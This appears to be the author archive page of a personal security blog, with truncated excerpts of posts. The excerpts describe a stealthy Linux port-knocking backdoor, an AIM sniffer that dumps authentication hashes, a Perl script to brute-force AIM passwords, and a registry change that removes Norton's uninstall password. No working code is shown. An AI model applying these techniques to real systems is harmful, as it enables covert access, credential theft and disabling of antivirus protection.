Author Archives: twrightson

Linux Stealthy Backdoor using portknocking technique Wrote this program back in 2004 and had posted it using a pseudonym. I cleaned it up a tiny bit, and it is fully functional. The backdoor puts the interface in promiscuous mode and does not open a listen()ing socket until it sees 5 packets on port 5000 within a 60 second period. At […]

Three ways to count to 255

As an easy reference, here’s 3 ways to generate an IP address list for use with other scripts using three common scripting methods. 1. Windows For command Command: FOR /L %variable IN (start,step,end) DO command [command-parameters] Example: for /L %I (1,1,255) DO echo 192.168.1.%I >> IPs.txt 2. Bash Shell Example: for (( i=1; i<=5; i++)); […]

Win32 tcp connect() skeleton Very simple example of using winsock to connect to a chosen port. Grabbed most of the source from gandalf’s whois.c, so thank you gandalf. Sends the 3rd command line argument over the socket, prints the data received and then quits. Test it by telneting to an smtp server on port 25 and sending ‘helo […]

Brute Force AIM Password Perl Script – from Aimsniff Authentication Dump

Here’s the perl script to brute force the aim password using the challenge code and response hash from Aimsniff. It is very surprising how fast it is, especially considering it’s just using an interpreted language. Best thing would be to use a dictionary creator and go to town. Benchmark it by putting your password at […]

Win32 EICAR Creator

Source and Executable Here I had posted earlier about the EICAR virus. Threw together a simple prog to spit out the virus to any location for testing of antivirus programs. Usage: eicar.exe . Let me know if it comes in handy, I’ll show an example of some creative uses later.

Aimsniff v0.2 – includes authentication dump

Source Code Here Fixed up some of the code so that we get less garble on certain packets. We still see that sometimes and it appears that it’s either retrans or fragmented packets, need to do some more debugging to find out. Newest feature is dumping the authentication challenge and response hash. Both of these […]

AIM OSCAR Authentication Process

So I wanted to include a routine in the aim sniffer to dump the authentication challenge and response hash to allow for brute forcing of the users password. Took some time to find the correct documentation on the OSCAR protocol but once I did it was pretty straightforward. Below is the basic process. 1. Server […]

Aimsniff v0.1

Source Code Here Here’s a simple console Aim Sniffer I had written a while ago. Great for getting familiar with libpcap. The output is not necessarily pretty but great for those impromptu sniffing sessions. If you look at the source code I hardly commented this code at all which is a shame because the OSCAR […]

Norton / Symantec Uninstall Password…. wtf?

So apparently if you want to uninstall Norton Antivirus and you get prompted for a password you can disable this as easily as you can change your background. All you need to do is flip the value of the following registry key from 1 to 0. HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\Administrator Only\Security\VPuninstallpassword This seems to beg the question… wtf? […]

Cisco Poller Perl Script

Very extensible perl script to periodically poll Cisco devices via telnet and send any commands to the device and save the output.